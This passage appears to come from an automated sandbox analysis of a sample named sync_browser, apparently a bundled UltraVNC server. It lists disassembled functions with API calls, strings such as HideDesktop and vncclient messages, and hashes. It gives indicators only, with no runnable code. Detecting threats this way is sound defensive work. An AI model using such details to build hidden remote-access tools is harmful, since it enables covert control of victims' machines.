                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: inet_addr$connectgethostbynamehtonssocket
                                                                    • String ID: 0123456789.
                                                                    • API String ID: 478842821-2088042752
                                                                    • Opcode ID: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                    • Instruction ID: 1565083125b2ec84c8bd3c8f6bdc68fcf316f658089e280de9de69af37467020
                                                                    • Opcode Fuzzy Hash: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                    • Instruction Fuzzy Hash: 05418361A0876985EA209F22E94017D73A0FF88F95F044232ED9D87794EF3DE563C750
                                                                    Function 00007FF6DC0F5AE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
                                                                    • String ID: ConsoleWindowClass$tty
                                                                    • API String ID: 490048385-1921057836
                                                                    • Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                    • Instruction ID: 01ef7c6b08d69753f93c82c61c3a774a8bc7ec21b1cfd776e6a0083de9212bcc
                                                                    • Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                    • Instruction Fuzzy Hash: 5D4162367086898ADB24CB26E49466DB7A5FB88B84F444036DF8E83B54DF3DE556CB00
                                                                    Function 00007FF6DC0E8ED0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CursorEnterLeave$Rect
                                                                    • String ID: ^
                                                                    • API String ID: 2550375211-1590793086
                                                                    • Opcode ID: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                                    • Instruction ID: 294041090ec161d2069f3d19e6b2f0d904a829c9f48e75408587e8f597c63247
                                                                    • Opcode Fuzzy Hash: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                                    • Instruction Fuzzy Hash: 5F41EC366086458BD728CF19E59436DB7A1F788B94F104236DB6D83B54CF39E466CF00
                                                                    Function 00007FF6DC0CA6B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF6DC0CA7AC
                                                                    • HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF6DC0CA726
                                                                    • HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF6DC0CA738
                                                                    • HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF6DC0CA7E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorInfoLastParametersSystem
                                                                    • String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
                                                                    • API String ID: 2777246624-2146332292
                                                                    • Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                    • Instruction ID: be562dea8b8c9d708e8f6f9fa88141fa2e136efc1d7ce55cf9cb1f214792136e
                                                                    • Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                    • Instruction Fuzzy Hash: 24418135E1869A8AE724CF50E9406AD7364FB84748F500237DA8EC7A58DF3DE567C700
                                                                    Function 00007FF6DC0D9630 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFileInfoLastSizeVersion
                                                                    • String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
                                                                    • API String ID: 752140088-134519983
                                                                    • Opcode ID: 090d12dc5aa2e90c36e1021850def166bee45461e9230a84e46210d1a437b15e
                                                                    • Instruction ID: 2f6e3fb0409ddd836cffb6d95fe809eafa85ea4ae196cca80a37ddf331f2a0d6
                                                                    • Opcode Fuzzy Hash: 090d12dc5aa2e90c36e1021850def166bee45461e9230a84e46210d1a437b15e
                                                                    • Instruction Fuzzy Hash: 0721F861F0965E81EA049B62AC002ED63A4FF85BD5F440032DE4D87B58EF7CD5A7CB00
                                                                    Function 00007FF6DC179ABC Relevance: 13.6, APIs: 9, Instructions: 142COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$_invalid_parameter_noinfofreemalloc
                                                                    • String ID:
                                                                    • API String ID: 3646291181-0
                                                                    • Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                    • Instruction ID: 255a8fc6e8421e8c8ce6a3e6589cab2a0f3385384c7956e9664f685a21ee947f
                                                                    • Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                    • Instruction Fuzzy Hash: 8C51CE62E086AACAFB109F24DC4076D2698EB45BA4F444633EA1D877C6DF3CE4679700
                                                                    Function 00007FF6DC17AD6C Relevance: 13.6, APIs: 9, Instructions: 98COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _lock.LIBCMT ref: 00007FF6DC17AD95
                                                                      • Part of subcall function 00007FF6DC1877D0: _amsg_exit.LIBCMT ref: 00007FF6DC1877FA
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17ADC8
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17ADE6
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17AE26
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17AE40
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17AE50
                                                                    • _initterm.LIBCMT ref: 00007FF6DC17AE90
                                                                    • _initterm.LIBCMT ref: 00007FF6DC17AEA3
                                                                    • ExitProcess.KERNEL32 ref: 00007FF6DC17AEDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                                                                    • String ID:
                                                                    • API String ID: 3873167975-0
                                                                    • Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                    • Instruction ID: e20b36d20ba36123348266e99702ef0b365b3213d599d9d8b1e65849acf07b70
                                                                    • Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                    • Instruction Fuzzy Hash: 89418D21A1DA6AC2F6109B15EC4023D7298BF88B94F241037E94DC3BA5EF3CE47B8700
                                                                    Function 00007FF6DC0D7AF0 Relevance: 13.5, APIs: 9, Instructions: 36fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
                                                                    • String ID:
                                                                    • API String ID: 4242051881-0
                                                                    • Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                    • Instruction ID: d646e3c3e0c71f36a8065bb1a7d66c840fba97979e4adff87ebb26575f356a4e
                                                                    • Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                    • Instruction Fuzzy Hash: 3211BE25A06A1A85EF589F65ED5437C3368FF85F59F040032C91E82668CF2DD467CB41
                                                                    Function 00007FF6DC0E593D Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 186452611-3977938048
                                                                    • Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                    • Instruction ID: 0c246b6c31fe8827acb78be1412ca12024931996fdec6630bac35f2d11637bc9
                                                                    • Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                    • Instruction Fuzzy Hash: ECA1E222A086D585FB50CB65C8587FE2BA9EB85B44F194137CA4CC77A5CF3EE466CB00
                                                                    Function 00007FF6DC0EBD70 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
                                                                    • String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
                                                                    • API String ID: 3897446562-3886131270
                                                                    • Opcode ID: 2dc71b03babb7fd5399608604822ef7cdffab7c460b881fcd3b864ae7abfc419
                                                                    • Instruction ID: 9acb818ab9eac09f5fcd20581fa2aee7471054819e9f9d3e7f6ae190c38fb8ce
                                                                    • Opcode Fuzzy Hash: 2dc71b03babb7fd5399608604822ef7cdffab7c460b881fcd3b864ae7abfc419
                                                                    • Instruction Fuzzy Hash: 5681AF22A08B9998EB10CB74D8003ED37A4FB457A4F504333EA7D83AD9DF69D51AC700
                                                                    Function 00007FF6DC0D9260 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Version$AddressHandleInfoModuleProcSystem
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 335284197-192647395
                                                                    • Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                    • Instruction ID: b27c6d93e8c1125d37aa0147470b9b3d8b15c517df6256cd72977136d37d6c12
                                                                    • Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                    • Instruction Fuzzy Hash: 66311A31E0CA8686FA709B11F85537E73A4FBD4704F840036E69EC2A95EF6DE4678B40
                                                                    Function 00007FF6DC0F00F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDeviceCaps.GDI32 ref: 00007FF6DC0F0113
                                                                    • GetDeviceCaps.GDI32 ref: 00007FF6DC0F0140
                                                                    • GetDeviceCaps.GDI32 ref: 00007FF6DC0F016D
                                                                      • Part of subcall function 00007FF6DC0CA040: OpenInputDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA07A
                                                                      • Part of subcall function 00007FF6DC0CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF6DC0CA083
                                                                      • Part of subcall function 00007FF6DC0CA040: GetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA08B
                                                                      • Part of subcall function 00007FF6DC0CA040: SetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0A6
                                                                      • Part of subcall function 00007FF6DC0CA040: MessageBoxA.USER32 ref: 00007FF6DC0CA0B7
                                                                      • Part of subcall function 00007FF6DC0CA040: SetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0C2
                                                                      • Part of subcall function 00007FF6DC0CA040: CloseDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
